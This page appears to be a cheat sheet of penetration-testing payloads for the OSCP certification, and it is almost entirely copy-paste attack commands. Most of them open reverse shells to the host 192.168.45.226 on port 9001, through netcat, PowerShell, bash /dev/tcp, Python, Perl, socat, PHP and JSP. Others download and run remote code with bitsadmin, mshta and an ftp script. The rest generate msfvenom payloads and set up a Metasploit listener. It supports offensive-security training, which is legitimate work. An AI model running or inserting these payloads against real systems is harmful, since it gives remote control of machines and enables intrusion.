Skip to content

OSCP & OSCP+ Payload Cheat Sheet

📌 Table of Contents

  1. Windows Payloads
  2. Linux Payloads
  3. Web Payloads
  4. Metasploit Multi-Handler Setup
  5. Msfvenom Payload Generation
  6. Staged vs Stageless Payloads

Windows Payloads

Manual Reverse Shells

Netcat

nc.exe -e cmd.exe 192.168.45.226 9001

nc.exe -nv 192.168.45.226 9001 -e cmd.exe

Powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Cmd.exe

cmd.exe /c "echo open 192.168.45.226 9001 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get reverse_shell.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt"

Bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://192.168.45.226/malware.exe C:\Windows\Temp\malware.exe

Mshta

mshta "javascript:a=new ActiveXObject('WScript.Shell'); a.Run('cmd.exe /c powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(''http://192.168.45.226/shell.ps1'')'); close();"

Linux Payloads

Manual Reverse Shells

Netcat

nc -e /bin/bash 192.168.45.226 9001

/bin/sh -i >& /dev/tcp/192.168.45.226/9001 0>&1

Bash

bash -i >& /dev/tcp/192.168.45.226/9001 0>&1

Python

python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.226",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="192.168.45.226";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Socat

socat TCP4:192.168.45.226:9001 EXEC:/bin/bash

Web Payloads

PHP Reverse Shell

php -r '$sock=fsockopen("192.168.45.226",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

JSP Reverse Shell

<% Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'"); %>

WAR (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f war > shell.war

Metasploit Multi-Handler Setup

msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST 192.168.45.226
set LPORT 9001
exploit

Msfvenom Payload Generation

Windows (Non-Meterpreter)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe

Linux (Non-Meterpreter)

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f elf > shell.elf

MacOS

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f macho > shell.macho

💥 Python

msfvenom -p python/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f raw > shell.py

Web Payloads

PHP

msfvenom -p php/reverse_php LHOST=192.168.45.226 LPORT=9001 -f raw > shell.php

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f raw > shell.jsp

WAR (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f war > shell.war

Staged vs Stageless Payloads

Staged Payload (small, requires Metasploit)

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe

Stageless Payload (larger, independent execution)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe